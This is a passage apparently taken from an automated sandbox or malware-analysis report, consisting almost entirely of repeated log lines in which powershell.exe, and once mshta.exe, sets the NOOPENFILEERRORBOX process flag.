            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
